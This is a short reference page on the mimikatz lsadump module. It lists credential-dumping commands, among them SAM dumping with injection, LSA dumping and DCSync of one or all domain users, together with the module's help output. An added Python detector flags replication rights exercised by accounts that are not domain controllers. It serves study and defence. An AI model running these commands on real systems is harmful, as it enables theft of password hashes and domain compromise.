Overview: using and analyzing the mimikatz project
lsadump
Online reference manual: Mimikatz 🥝 | The Hacker Tools #manual
Command help
Getting local user hashes
```
# Enable the debug privilege
privilege::debug
# Read the SAM
lsadump::sam
# Retrieve using injection
lsadump::sam /inject
# Show the module help
mimikatz # lsadump::
ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !

Module :        lsadump
Full name :     LsaDump module

             sam  -  Get the SysKey to decrypt SAM entries (from registry or hives)
         secrets  -  Get the SysKey to decrypt SECRETS entries (from registry or hives)
           cache  -  Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)
             lsa  -  Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject)
           trust  -  Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly)
      backupkeys
          rpdata
          dcsync  -  Ask a DC to synchronize an object
        dcshadow  -  They told me I could be anything I wanted, so I became a domain controller
         setntlm  -  Ask a server to set a new password/ntlm for one user
      changentlm  -  Ask a server to set a new password/ntlm for one user
         netsync  -  Ask a DC to send current and previous NTLM hash of DC/SRV/WKS
        packages
             mbc
       zerologon
   postzerologon
```
Getting domain users
Reference article:
```
# Enable the debug privilege
privilege::debug
# Elevate the token
token::elevate
# Run with injection
lsadump::lsa /inject
# Ask a DC to synchronize one user object (DCSync)
lsadump::dcsync /user:username
# Retrieve the specified user using injection
lsadump::dcsync /user:username /inject
# Retrieve all users in the domain
lsadump::dcsync /domain:test.com /all /csv
```
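For the defensive side of the `lsadump::dcsync` commands above, the following added example (not from the original page or the mimikatz project) flags directory replication rights exercised by accounts that are not domain controllers, based on Security event 4662. It assumes Directory Service Access auditing is enabled; the event dictionaries, field subset, account names and the `find_dcsync_candidates` helper are constructed for illustration.

```python
import re
from collections import defaultdict

# Control-access-right GUIDs for directory replication (AD schema values).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{?([0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})\}?")


def find_dcsync_candidates(events, dc_accounts):
    """Return {account: sorted right names} for 4662 events in which an
    account outside the DC allowlist exercised a replication right."""
    allowed = {a.lower() for a in dc_accounts}
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        user = ev.get("SubjectUserName", "")
        if user.lower() in allowed:
            continue  # replication between domain controllers is expected
        for guid in GUID_RE.findall(ev.get("Properties", "")):
            name = REPL_RIGHTS.get(guid.lower())
            if name:
                hits[user].add(name)
    return {u: sorted(r) for u, r in hits.items()}


# Constructed sample events (simplified fields; not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "alice",
     "Properties": "%%7688 {1131F6AD-9C07-11D1-F79F-00C04FC2DCD2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "alice",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "bob",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "carol", "Properties": ""},
]

if __name__ == "__main__":
    for user, rights in find_dcsync_candidates(SAMPLE_EVENTS, ["DC01$"]).items():
        print(f"review: {user} used {', '.join(rights)}")
```

The allowlist should contain the machine accounts of real domain controllers and any service that legitimately replicates the directory; everything else that appears in the result is worth reviewing.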